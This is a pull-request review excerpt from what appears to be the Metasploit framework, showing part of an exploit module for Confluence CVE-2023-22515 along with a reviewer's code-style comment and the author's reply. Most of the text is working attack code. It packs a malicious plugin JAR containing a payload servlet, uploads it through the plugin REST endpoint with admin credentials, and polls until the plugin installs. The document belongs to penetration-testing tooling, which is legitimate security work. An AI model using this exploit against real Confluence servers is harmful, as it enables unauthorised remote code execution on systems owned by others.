modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22515.rb

```diff
@@ -0,0 +1,319 @@
+    <version>1.0</version>
+  </plugin-info>
+  <servlet key="#{rand_text_alpha(8)}" class="metasploit.PayloadServlet">
+    <url-pattern>#{normalize_uri(payload_endpoint)}</url-pattern>
+  </servlet>
+</atlassian-plugin>)
+      )
+
+      jar.add_file('metasploit/PayloadServlet.class', MetasploitPayloads.read('java', 'metasploit', 'PayloadServlet.class'))
+
+      message = Rex::MIME::Message.new
+
+      message.add_part(jar.pack, 'application/octet-stream', 'binary', "form-data; name=\"plugin\"; filename=\"#{rand_text_alphanumeric(8)}.jar\"")
+
+      # 6. Upload the malicious plugin.
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0') << '/',
+        'ctype' => 'multipart/form-data; boundary=' + message.bound,
+        'headers' => {
+          'Authorization' => basic_auth(admin_username, admin_password),
+          'Accept' => '*/*'
+        },
+        'vars_get' => {
+          'token' => upm_token
+        },
+        'data' => message.to_s
+      )
+
+      unless res&.code == 202
+        fail_with(Failure::UnexpectedReply, 'Uploading plugin failed, unexpected reply from endpoint: /rest/plugins/1.0/')
+      end
+
+      unless res.body =~ %r{<textarea>(.+)</textarea>}
+        fail_with(Failure::UnexpectedReply, 'Uploading plugin failed, unexpected reply data from endpoint: /rest/plugins/1.0/')
+      end
+
+      plugin_json = JSON.parse(::Regexp.last_match(1))
+
+      # We get bas a JSON object like this:
+      # <textarea>{"type":"INSTALL","pingAfter":100,"status":{"done":false,"statusCode":200,"contentType":"application/vnd.atl.plugins.install.installing+json","source":"JQEjEJBr.jar","name":"JQEjEJBr.jar"},"links":{"self":"/rest/plugins/1.0/pending/52227753-1c3e-496f-a4f4-d52a8b3850dc","alternate":"/rest/plugins/1.0/tasks/52227753-1c3e-496f-a4f4-d52a8b3850dc"},"timestamp":1697471602188,"userKey":"4028d6b28b294680018b39311d17001e","id":"52227753-1c3e-496f-a4f4-d52a8b3850dc"}</textarea>
+
+      links_alternate = plugin_json.dig('links', 'alternate')
+
+      print_status('Waiting for plugin to be installed...')
+
+      # 7. The plugin is installed asynchronously, so we poll the server for installation to be completed.
+      plugin_ready = retry_until_truthy(timeout: datastore['CONFLUENCE_PLUGIN_TIMEOUT']) do
+        res = send_request_cgi(
+          'method' => 'GET',
+          'uri' => normalize_uri(target_uri.path, links_alternate)
+        )
+
+        # We receive a JSON result to indicate if teh plugin is finished installing.
+        # {"links":{"self":"/rest/plugins/1.0/tasks/52227753-1c3e-496f-a4f4-d52a8b3850dc","result":"/rest/plugins/1.0/plkWITNH-key"},"done":true,"type":"INSTALL","progress":1.0,"pollDelay":100,"timestamp":1697471602188}
+
+        done = false
+
+        if res&.code == 200
+          begin
+            res_json = JSON.parse(res.body)
+            done = res_json['done'] == true
```

Comment:
```suggestion
            if JSON.parse(res.body)['done'] == true
              return true
            end
```

No need for a `done` variable.

Reply:
Resolved via [415bd49](https://github.com/rapid7/metasploit-framework/pull/18461/commits/415bd49b1565fd8bb0171b9e8da3a01cafcfa1d3). Note, we cannot use the `return` keyword in a yielded block as it forces the caller to return, we must instead use the `next` keyword so that `retry_until_truthy` will keep looing as expected.